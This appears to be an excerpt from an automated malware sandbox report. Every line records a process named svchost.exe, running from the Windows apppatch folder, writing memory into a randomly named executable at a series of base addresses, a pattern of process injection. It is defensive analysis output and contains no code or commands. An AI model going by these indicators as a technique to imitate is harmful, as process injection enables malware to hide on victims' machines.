    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2A05000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2740000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2741000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2742000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2795000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: CB0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: CB1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: CB2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D05000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2890000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2891000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2892000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28E5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1110000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1111000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1112000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1165000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1505000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2210000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2211000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2212000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2265000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EA0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EA1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EA2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EF5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2860000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2861000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2862000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B50000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B51000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B52000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2BA5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 13B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 13B1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 13B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1405000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2230000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2231000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2232000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2285000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2980000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2981000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2982000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2320000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2321000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2322000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2375000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2A15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2990000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2991000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2992000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29E5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2870000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2871000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2872000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2580000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2581000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2582000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 25D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2800000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2801000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2802000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2855000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C00000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C01000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C02000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C55000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D30000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D31000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D32000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D85000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 820000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 821000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 822000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 875000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 31B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 31B1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 31B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3205000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2870000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2871000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2872000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2CF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2CF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2CF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2AC0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2AC1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2AC2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2600000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2601000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2602000Jump to behavior
